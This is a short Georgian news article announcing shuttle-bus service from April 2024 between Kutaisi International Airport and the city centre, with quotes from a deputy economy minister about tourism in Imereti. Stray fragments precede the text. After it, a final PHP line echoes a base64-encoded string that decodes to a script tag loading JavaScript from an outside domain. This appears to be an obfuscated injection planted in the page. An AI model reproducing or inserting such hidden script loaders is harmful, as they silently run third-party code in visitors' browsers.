celsiusi
ავერსი შნაიდერი

 2024 წლის აპრილიდან ქუთაისის დავით აღმაშენებლის სახელობის საერთაშორისო აეროპორტიდან ქალაქ ქუთაისამდე და პირიქით, მგზავრებს სამი უახლესი ავტობუსი (SHUTTLE BUS) მოემსახურება.

როგორც საქართველოს აეროპორტების გაერთიანებაში განმარტავენ, ქუთაისის აეროპორტიდან ცენტრამდე ტრანსპორტის დანიშვნის მიზნით, ავტობუსების შესაძენად ტენდერი უკვე გამოცხადდა.

ეკონომიკისა და მდგრადი განვითარების მინისტრის მოადგილის, მარიამ ქვრივიშვილის განცხადებით, იმერეთის მხარის ტურისტული სექტორის თხოვნის შედეგად, აღნიშნულ სერვისს საქართველოს აეროპორტების გაერთიანება უზრუნველყოფს.

„ქუთაისის საერთაშორისო აეროპორტი ყველაზე სწრაფად მზარდი აეროპორტია ჩვენს ქვეყანაში. გაზრდილ მგზავრთნაკადსა და პირდაპირ საჰაერო მიმოსვლებთან ერთად, მნიშვნელოვანია, გაიზარდოს ტურისტული ვიზიტების და ღამისთევების რაოდენობა ქუთაისსა და სრულიად იმერეთში“, – აღნიშნა მინისტრის მოადგილემ.

მისი თქმით, რეგულარული შატლსერვისების დანიშვნა ქუთაისის აეროპორტსა და ქალაქის ცენტრს შორის მნიშვნელოვანი სიახლეა იმერეთის ტურისტულ ინდუსტრიაში ჩართული მცირე და საშუალო მეწარმებისთვის, რომელთაც ექნებათ მეტი შესაძლებლობა და წვდომა ქუთაისის საერთაშორისო აეროპორტში ჩამოსულ საერთაშორისო მოგზაურებთან.

„დარწმუნებული ვარ, რომ ეს სიახლე დადებითად აისახება იმერეთის ტურიზმის ინდუსტრიის კიდევ უფრო მეტად გაძლიერებაზე“, – აღნიშნა მარიამ ქვრივიშვილმა.

საქართველოს აეროპორტების გაერთიანებაში აღნიშნავენ, რომ ავტობუსების განრიგი ფრენების განრიგზე მაქსიმალურად იქნება მორგებული.

192
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");